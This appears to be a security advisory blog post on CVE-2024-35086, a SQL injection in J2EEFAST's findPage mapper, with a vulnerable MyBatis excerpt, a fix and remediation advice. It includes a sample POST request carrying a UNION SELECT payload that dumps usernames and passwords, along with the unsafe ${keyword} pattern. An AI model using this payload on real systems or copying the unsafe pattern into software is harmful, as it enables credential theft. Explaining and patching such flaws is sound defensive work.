CVE-2024-35086 - Critical SQL Injection in J2EEFAST v2.7. via BpmTaskFromMapper.xml `findPage` Function

A critical SQL Injection vulnerability has been discovered in J2EEFAST version 2.7., tracked as CVE-2024-35086. The issue exists in the findPage function of BpmTaskFromMapper.xml, a core XML map file responsible for handling workflow task queries in this open-source Java-based enterprise platform.

If exploited, this flaw allows remote attackers to inject malicious SQL code and potentially gain access to sensitive data, manipulate the database, or escalate privileges within the application—all without authentication.

What is J2EEFAST?

J2EEFAST is a Java-based enterprise application platform used for building robust business workflow and management systems. It’s open-source and widely adopted for rapid enterprise application development, making vulnerabilities in it pose a heightened risk for organizations.

How the Vulnerability Occurs

The vulnerability stems from improper input sanitization in the findPage function. User-supplied input is used directly in SQL statements without parameterization, making the application vulnerable to SQL injection.

Below you can see a simplified, vulnerable code excerpt

<!-- BpmTaskFromMapper.xml -->
<select id="findPage" resultType="com.example.BpmTask">
  SELECT * FROM bpm_task
  WHERE status = #{status}
  AND task_name LIKE '%${keyword}%'
</select>

Notice the use of ${keyword} inside the SQL. This comes directly from user input and is not sanitized or parameterized, making it possible for attackers to inject arbitrary SQL code.

Here's a sample POST request that could exploit this vulnerability to dump all user table data

POST /bpm/task/findPage HTTP/1.1
Host: vulnerable.com
Content-Type: application/json

{
  "status": "open",
  "keyword": "test%' UNION SELECT username, password FROM users --"
}

The resulting SQL looks like this

SELECT * FROM bpm_task
WHERE status = 'open'
AND task_name LIKE '%test%' UNION SELECT username, password FROM users --%'

The attacker successfully retrieves username and password columns from the users table.

How to Fix

Immediate Workaround:
Disable access to the affected endpoint if possible.

Permanent Fix:
Use MyBatis # parameterization for all dynamic inputs and never use ${} for user-controlled data.

Safe Code Example

<select id="findPage" resultType="com.example.BpmTask">
  SELECT * FROM bpm_task
  WHERE status = #{status}
  AND task_name LIKE CONCAT('%', #{keyword}, '%')
</select>

Here, #{} ensures input is properly parameterized and safe.

Original References

- NVD Listing for CVE-2024-35086
- J2EEFAST GitHub Repository
- MyBatis Security Best Practices

Recommendations

- Update to the latest version immediately (check official releases)

Educate developers about SQL injection and safe parameterization practices

If you operate J2EEFAST in production, prioritize patching this vulnerability now. SQL injection is one of the most critical web flaws and has led to some of the largest breaches in history.


> *Stay secure! Always keep dependencies up-to-date and follow secure coding practices.*


*Written exclusively for your security reading by AI Security Insights (2024).*

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/02/2024 03:07:46 UTC